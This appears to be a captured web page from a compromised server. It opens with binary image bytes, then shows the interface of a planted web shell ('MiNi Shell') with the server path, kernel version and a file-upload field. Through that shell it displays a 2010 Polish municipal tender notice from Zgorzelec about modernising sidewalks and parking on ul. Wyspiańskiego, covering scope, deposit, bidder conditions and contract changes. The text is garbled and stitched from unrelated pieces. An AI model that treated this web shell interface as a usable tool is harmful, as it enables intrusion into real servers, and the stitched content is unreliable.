JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/290000-N-2010.html

<p class="kh_header"><b>Zgorzelec: Modernizacja chodników, parkingów oraz nawierzchni drogi ul. Wyspiańskiego - etap I modernizacja nawierzchni chodników i parking ów w obrębie budynków 47-61 i 63-75.</b><br>
<b>Numer ogłoszenia: 290000 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja chodników, parkingów oraz nawierzchni drogi ul. Wyspiańskiego - etap I modernizacja nawierzchni chodników i parking ów w obrębie budynków 47-61 i 63-75..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie i modernizacji ciągów pieszych ul. Wyspiańskiego oraz przyległych do ulicy miejsc postojowych.   
2. Etap I robót obejmuje modernizację nawierzchni chodników i parkingów  w obrębie 
budynków 47-61 i 63-75 ul. Wyspiańskiego. 
3. Roboty budowlane polegać będą na wymianie istniejących nawierzchni bitumicznych ciągów pieszych oraz nawierzchni z drobnowymiarowych elementów betonowych, z których wykonane są miejsca postojowe. 
4. W ramach prac należy wykonać zabudowę nowych krawężników i obrzeży betonowych. Wykonać należy również nowe miejsca postojowe. 
5. Powierzchnie elementów podlegających przebudowie:
1) rozebranie nawierzchni z płyt drogowych betonowych o gr. 15 cm - 684,70m2 , 
2) rozebranie krawężników betonowych 15 x 30 cm - 179,30 m, 
3) rozebranie obrzeży betonowych trawnikowych 8 x 30 cm - 262,90m, 
4) rozebranie chodników z płytek betonowych - 76,60m2 , 
5) mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych  grubości
6 cm - 1073,29m2 , 
6) utylizacja asfaltu - 96,596 t, 
7) ułożenie krawężników betonowych 15 x 30 cm - 291,60m, 
8) profilowanie i zagęszczanie podłoża - 1111,20m2 , 
9) nawierzchnia z kostki brukowej - kostka szara grubości 8 cm - 888,96m2 , 
10) nawierzchnia z kostki brukowej - kostka czerwona grubości 8 cm - 222,24m2 , 11) malowanie znaków miejsc postojowych dla osób niepełnosprawnych - 4,00m2 ,
12) ułożenie obrzeży betonowych 30 x 8 cm - 262,90m, 
13) profilowanie  i zagęszczanie podłoża - 843,60m2 , 
14) chodniki z kostki brukowej grubości 8 cm- kostka szara - 674,88m2 , 
15) chodniki z kostki brukowej grubości 8 cm - kostka czerwona - 168,72m2 
16) remonty cząstkowe nawierzchni bitumicznych - 4,5 t, 
17) ręczne czyszczenie poboczy  1530m2 , 
18) wykonanie trawników parkowych  - 1530m2 , 
19) sadzenie drzew i krzewów - 12 szt.,     
6.Szczegółowy opis i zakres robót dla zadania objętego modernizacją nawierzchni chodników i  parkingów w obrębie budynków 47-61 i 63-75  przy ul. Wyspiańskiego  został zawarty   w dokumentacji projektowej składającej się z projektu budowlanego, projektu wykonawczego, Specyfikacji Technicznej Wykonania i Odbioru Robót, przedmiaru  robót  - załącznik nr 9 do SIWZ.     
7. Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
na czas trwania budowy.  
8.  Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 
9.  Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z 
decyzją  pozwolenia na budowę nr 186/2010 z dnia 28.05.2010r. wydaną przez Starostę Zgorzeleckiego oraz zatwierdzonym do niej projektem budowlanym, przedmiarem robót, Specyfikacją Techniczną Wykonania i Odbioru Robót, technologią wskazaną przez Projektanta, zgodnie z zasadami wiedzy technicznej, normami,  wskazaniami Zamawiającego, oraz obowiązującymi przepisami.
10.Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
W skład kompletnej dokumentacji powykonawczej wchodzi:
1) inwentaryzacja geodezyjna powykonawcza, 
2) atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń
3) aprobaty techniczne, 
4) uzupełniony dziennik budowy, 
5) wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
    Wykonawcę badań i sprawdzeń,       
6) oświadczenie kierownika budowy  o zgodności wykonania obiektu budowlanego
    z projektem budowlanym, warunkami pozwolenia na budowę, przepisami i 
    obowiązującymi Polskimi Normami oraz oświadczenie kierownika budowy o 
    doprowadzeniu do należytego stanu i porządku terenu budowy, a także sąsiedniej 
    ulicy, nieruchomości, 
7) w  przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego 
    projektu i warunków zgłoszenia robót niewymagających pozwolenia na budowę, 
    Wykonawca  dołączy kopie rysunków wchodzących  w skład zatwierdzonego 
    projektu budowlanego, z naniesionymi zmianami i uzupełniającym opisem, w takim 
    przypadku oświadczenie kierownika budowy powinno być zatwierdzone przez 
    projektanta i inspektora nadzoru, 
8)  oświadczenie kierownika budowy o wbudowaniu materiałów, na które dostarczono 
      dokumenty odbiorowe, oraz zgodności materiałów z Specyfikacją Techniczną 
          Wykonania i Odbioru Robót i projektem budowlanym, 
9)  oświadczenie inspektora nadzoru inwestorskiego o zgodności wykonania obiektu
     budowlanego z projektem budowlanym, warunkami pozwolenia na budowę, 
     przepisami  i  obowiązującymi Polskimi Normami, 
10) pisemną gwarancję jakości na wykonany przedmiot umowy, z treści dokumentu 
      gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, jak długo 
      gwarancja obejmuje, co jest  wyłączone z gwarancji, 
11) deklaracje zgodności z określeniem miejsca przeznaczenia,  zgodnie z ustawą 
      z dnia 16.04.2004r. o wyrobach budowlanych (Dz.U. Nr 92, poz. 881 z późn.zm.) 
      oraz  ustawą z dnia 30.08. 2002r. o systemie oceny zgodności (tekst jednolity z 
      2004r. Dz.U. Nr 204, poz. 2087), 
12) oświadczenie właściciela terenu na którym prowadzona była inwestycja o 
      przywróceniu terenu do stanu pierwotnego,   
11.Zobowiązuje się Wykonawcę do wykonania i przedstawienia  Zamawiającemu, 
     zatwierdzonego projektu docelowej organizacji ruchu wraz z wprowadzeniem,  
     zgodnie z zatwierdzonym projektem oznakowania parkingów, najpóźniej w 
     dniu  dokonywania czynności odbiorowych robót  budowlanych.         
12.Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
     odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas 
     realizacji zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. 
     (tekst jednolity  z 2007r. Dz. U. Nr 39, poz. 251 z późn. zm.)  i ustawą Prawo 
     ochrony środowiska  z dnia  27  kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. 
     Nr 25, poz.150 z późn.zm.). 
13.Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania, 
     odpadów zgodnie z powszechnie obowiązującymi przepisami. 
14. Wykonawca wykona przedmiot umowy z materiałów własnych, które powinny 
      odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i 
      stosowania w  budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. 
      Prawo budowlane (tekst jednolity z 2006r. Dz. U. Nr 156, poz. 1118 z późn.zm.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.51-3, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 109.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości 6000,00 zł. PLN (słownie: sześć tysięcy zł.)
2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
ofert.  
3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  formach:
1)   pieniądzu,
2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
       kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)   gwarancjach bankowych,
4)   gwarancjach ubezpieczeniowych,
5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
      ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
      Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
5. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie wadium do Zamawiającego.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I O/Zgorzelec.
Na przelewie należy umieścić informację :
Wadium na  Modernizacja chodników, parkingów oraz nawierzchni drogi ul. Wyspiańskiego - etap I modernizacja nawierzchni chodników i parkingów w obrębie budynków 47-61, 63-75                   
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy,którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 24.13 SIWZ. 
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
Zamawiającego. 
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
oferta  została wybrana :
a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
    określonych w ofercie, 
b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
    przyczyn   leżących  po stronie wykonawcy.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
    metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia  wymienione w pkt.11 i 12 SIWZ. 
2/ Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3/ Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
    spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
    z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
- dwie roboty budowlane polegające na budowie lub przebudowie          
   nawierzchni  z kostki betonowej brukowej o  łącznej wartości nie mniejszej 
   niż 400 000,00 zł.  brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje  
- minimum 1 osobą, która będzie wykonywać zamówienie,  posiadającą           
  prawo wykonywania samodzielnych funkcji technicznych w budownictwie do 
  kierowania robotami budowlanymi  w specjalności drogowej, wraz z 
  informacją   Wykonawcy o podstawie do dysponowania tą osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
       konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
      zamówień   publicznych - załącznik nr 2 do SIWZ, 
W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego nie 
wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówieniewłasnymi siłami. 
Uwaga!
W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych podmiotów, a nie załączy, bądź nie wypełni załącznika nr 2 do SIWZ do oferty, Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 11.1 pkt. 1 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
 1. Zakres przewidzianych zmian: 
1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w przypadku wystąpienia opóźnień wynikających z:  
a) opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest lub    będzie miało wpływ na termin realizacji przedmiotu umowy w szczególności dot. 
przekazania terenu budowy, dokonywania odbiorów robót oraz jakichkolwiek opóźnień, utrudnień, za które Wykonawca nie ponosi odpowiedzialności, 
b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
wykonanie robót budowlanych zgodnie z technologią  - fakt ten musi mieć 
odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez Inspektora 
c) zaistnienia przypadku działania siły wyższej, przez którą rozumieć należy 
zdarzenie zewnętrzne o charakterze: niezależnym od stron, którego strony nie 
mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć ani 
któremu strony nie mogły zapobiec przy zachowaniu należytej staranności.  
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą 
pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, nagłe przerwy 
w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
d) w przypadku wystąpienia istotnych wad dokumentacji projektowej, skutkujących 
koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub 
istotnie wstrzymuje realizację określonego rodzaju robót, 
e) wstrzymania robót przez uprawnione do tego organy, 
f) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
wpływ na realizację przedmiotu zamówienia,              
2) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
realizację umowy, o których mowa w § 11 projektu umowy.       
3) Zmiana Podwykonawcy możliwa będzie jedynie wtedy jeżeli zakres realizowanych 
przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony wniosek 
Wykonawcy, do którego winien załączyć on projekt umowy z Podwykonawcą, przy 
czym wymagana jest w tym wypadku pisemna zgoda Zamawiającego na zawarcie 
przez Wykonawcę umowy z innym Podwykonawcą.              
2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub postoju. 
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron umowy. 
